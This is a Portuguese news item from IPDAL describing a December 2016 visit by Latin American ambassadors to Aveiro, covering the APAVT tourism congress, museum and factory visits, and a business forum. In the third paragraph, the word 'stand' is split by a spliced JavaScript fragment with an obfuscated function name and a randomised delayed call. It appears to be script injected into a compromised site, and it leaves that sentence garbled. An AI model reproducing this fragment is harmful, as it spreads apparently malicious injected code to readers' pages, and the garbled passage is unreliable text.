Notícias

O IPDAL organizou uma visita dos Embaixadores latino-americanos à região de Aveiro.

A agenda consistiu num conjunto de encontros de caráter empresarial, institucional, académico, turístico e cultural.

A comitiva constituída pelo Presidente e Secretário-Geral do IPDAL, por oito embaixadores e um chefe de missão, assistiu à abertura do 42º Congresso Nacional da Associação Portuguesa de Agências de Viagens e Turismo (APAVT), onde o IPDAL voltou a ter um standom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and para promover os destinos turísticos dos países latino-americanos.

No dia 8 de Dezembro de 2016, foi promovida ainda uma visita turística aos principais centros de interesse da cidade de Aveiro e o grupo participou no jantar oficial de abertura do Congresso da APAVT.

A comitiva foi recebida em audiência pelo Presidente da Câmara Municipal de Aveiro, que acompanhou a visita ao Centro Municipal de Interpretação Ambiental e ao Museu de Santa Joana Princesa. O momento seguinte do programa foi uma visita à fábrica e ao recém-modernizado museu da Vista Alegre, em Ílhavo. O grupo Visabeira ofereceu o almoço, no Montebelo Vista Alegre Hotel.

Na tarde de dia 9, o IPDAL e a Associação Industrial do Distrito de Aveiro (AIDA) organizaram um fórum empresarial para divulgar oportunidades de negócio na América Latina.

O IPDAL continua assim a cumprir a sua missão de promover os países latino-americanos em todo o território português, uma prática que tem vindo a desenvolver desde a sua fundação.